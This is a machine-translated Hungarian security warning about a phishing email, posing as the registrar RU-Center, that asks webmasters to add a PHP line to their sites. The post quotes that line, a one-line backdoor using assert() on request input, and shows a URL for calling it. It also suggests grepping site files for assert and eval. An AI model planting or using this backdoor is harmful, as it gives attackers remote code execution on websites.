Figyelem a "webmesterekre", akik nem ismerik a PHP -t. Sebezhetőség.

Ez egy automatikus fordítás.
Ide kattintva elolvashatja a kiadványt az eredeti nyelven.

Ma néhány barátom levelet kapott, állítólag a RU -Center —től (a legnagyobb orosz domain névregisztrátor) — nic.ru, a következő tartalommal:

A leveleket az [email protected] címről küldtük . A levélben a támadók, akik a VV-Központ nevében képviseltetik magukat, javasolják a következő kód elhelyezését a webhelyen:

 <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>

Sajnos sok kollégánk, akik "webmestereknek" nevezik magukat (számos webhelytulajdonos), nem ismerik a PHP —t, és nem gondolnak a fenti kód veszélyeire. Ha egy karakterláncot ad át paraméterként ennek a függvénynek, akkor azt az assert () PHP kódnak tekinti! Legyen óvatos!

Javaslom, hogy az assert vagy az eval parancsok segítségével vizsgálja meg a php —projektjeiben a sebezhetőséget. Ha ezek a parancsok megtalálhatók a projekt kódjában, ne essen pánikba — tanulmányozza az algoritmusukat. Az algoritmusok engedélyezett használata teljesen lehetséges. Abban az esetben, a fenti példában a parancs lehetővé teszi, hogy a támadók, hogy hívja a webhely, például a RUCENTER paraméter — http://sistema-audit.ru/?RUCENTER=PHP-code

Javasoljuk, hogy végezzen keresést például a grep —i —r 'assert' / home / www / mysite / * linux paranccsal, amely a webhelyfájlokat tartalmazó mappát jelzi, hogy megkapja a gyanús fájlok listáját. példány a használt kód.

Vigyázzon magára és webhelyeire!

Ez egy automatikus fordítás.
Ide kattintva elolvashatja a kiadványt az eredeti nyelven.